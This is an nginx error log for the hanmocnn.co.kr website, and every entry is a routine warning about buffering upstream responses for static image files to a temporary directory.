2026/02/16 08:55:37 [warn] 865#865: *34257 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/35/0000009358 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:55:37 [warn] 865#865: *34257 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/35/0000009359 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:55:37 [warn] 865#865: *34257 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/36/0000009360 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:57:12 [warn] 865#865: *34267 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/36/0000009361 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 09:38:29 [warn] 865#865: *34306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/36/0000009362 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 09:38:29 [warn] 865#865: *34306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/36/0000009363 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 10:00:53 [warn] 863#863: *34340 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/36/0000009364 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 10:00:53 [warn] 863#863: *34340 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/36/0000009365 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 10:00:54 [warn] 863#863: *34340 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/36/0000009366 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 10:04:45 [warn] 863#863: *34353 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/36/0000009367 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 10:04:45 [warn] 863#863: *34353 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/36/0000009368 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 12:00:56 [warn] 872#872: *35941 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/11/0000010112 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 14:21:29 [warn] 874#874: *37574 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/86/0000010861 while reading upstream, client: 64.227.134.113, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:02:34 [warn] 884#884: *39314 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/86/0000010862 while reading upstream, client: 66.249.66.78, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr"
2026/02/16 19:21:51 [warn] 884#884: *39338 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/86/0000010863 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:24:26 [warn] 884#884: *39350 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/86/0000010864 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:24:26 [warn] 884#884: *39350 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/86/0000010865 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:24:26 [warn] 884#884: *39350 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/86/0000010866 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:33:39 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/86/0000010867 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:33:39 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/86/0000010868 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:33:39 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/86/0000010869 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:34:34 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/87/0000010870 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:34:34 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/87/0000010871 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:38:52 [warn] 884#884: *39387 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/87/0000010872 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:38:52 [warn] 884#884: *39387 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/87/0000010873 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:38:52 [warn] 884#884: *39387 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/87/0000010874 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:38:53 [warn] 884#884: *39387 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/87/0000010875 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:40:25 [warn] 884#884: *39399 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/87/0000010876 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:40:25 [warn] 884#884: *39399 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/87/0000010877 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:51:46 [warn] 884#884: *39417 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/87/0000010878 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:51:46 [warn] 884#884: *39417 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/87/0000010879 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 19:51:46 [warn] 884#884: *39417 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/88/0000010880 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:13:54 [warn] 882#882: *39438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/88/0000010881 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:13:54 [warn] 882#882: *39438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/88/0000010882 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:14:52 [warn] 882#882: *39438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/88/0000010883 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:20:12 [warn] 882#882: *39462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/88/0000010884 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:20:12 [warn] 882#882: *39462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/88/0000010885 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:22:41 [warn] 882#882: *39476 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/88/0000010886 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:22:41 [warn] 882#882: *39476 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/88/0000010887 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:22:41 [warn] 882#882: *39476 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/88/0000010888 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:22:41 [warn] 882#882: *39476 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/88/0000010889 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:24:17 [warn] 882#882: *39491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/89/0000010890 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:24:17 [warn] 882#882: *39491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/89/0000010891 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:24:17 [warn] 882#882: *39491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/89/0000010892 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:24:17 [warn] 882#882: *39491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/89/0000010893 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:37:34 [warn] 883#883: *39538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/89/0000010894 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:37:34 [warn] 883#883: *39538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/89/0000010895 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:37:35 [warn] 883#883: *39538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/89/0000010896 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:41:44 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/89/0000010897 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:41:44 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/89/0000010898 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:41:44 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/89/0000010899 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:41:44 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/90/0000010900 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:42:25 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/90/0000010901 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:42:25 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/90/0000010902 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:44:45 [warn] 883#883: *39581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/90/0000010903 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:44:45 [warn] 883#883: *39581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/90/0000010904 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:44:45 [warn] 883#883: *39581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/90/0000010905 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:44:45 [warn] 883#883: *39581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/90/0000010906 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:53:42 [warn] 883#883: *39595 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/90/0000010907 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:53:42 [warn] 883#883: *39595 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/90/0000010908 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 20:54:01 [warn] 883#883: *39595 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/90/0000010909 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:00:42 [warn] 883#883: *39618 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/91/0000010910 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:05:01 [warn] 886#886: *39631 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/91/0000010911 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:05:01 [warn] 886#886: *39631 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/91/0000010912 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/91/0000010913 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/91/0000010914 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/91/0000010915 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/91/0000010916 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/91/0000010917 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:49:42 [warn] 886#886: *39677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/91/0000010918 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
